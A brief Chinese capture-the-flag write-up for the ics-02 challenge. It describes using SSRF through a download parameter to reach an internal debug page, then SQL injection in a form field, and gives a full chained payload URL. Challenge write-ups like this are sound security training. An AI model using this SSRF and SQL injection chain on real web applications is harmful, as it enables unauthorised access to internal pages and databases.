初始页面，看到这种页面就比较头疼，无从下手

先来扫下目录

download会让我们下载一个ssrf的pdf文件

secret目录下包含着secret.php和secret_debug.php

login页面显示

paper下的超链接​​​​​​​

 再回头来看secret.php

当都选择第一项是可以跳转到私密页面2

随便填，注册成功，根据注释提示，结合之前的信息基本可以确定是通过SSRF去访问secret_debug.php了。 ​​​​​​​

 由于出现特殊符号会被截断，如

所以这里使用url编码，然后测试txtfirst_name这里存在注入 ,由于这里并不能直接回显，所以要错位到回显位置

payload:

?dl=http://127.0.0.1/secret/secret_debug.php?s=3&txtfirst_name=A','2',(这里填入sql语句如:database())from(cetcYssrf)),'3'/*&txtmiddle_name=mm&txtLast_name=fm&txtname_suffix=dm&txtdob=*/,'01/10/2022&txtdl_nmbr=2&txtRetypeDL=2&btnContinue2=Continue 

注意：每次提交测试都要更改参数的值，否则会报错。

参考文章：
攻防世界 ics-02 writeup 学习 - Zhu013 - 博客园
​​​​​​​xctf ics-02_old汪的博客-CSDN博客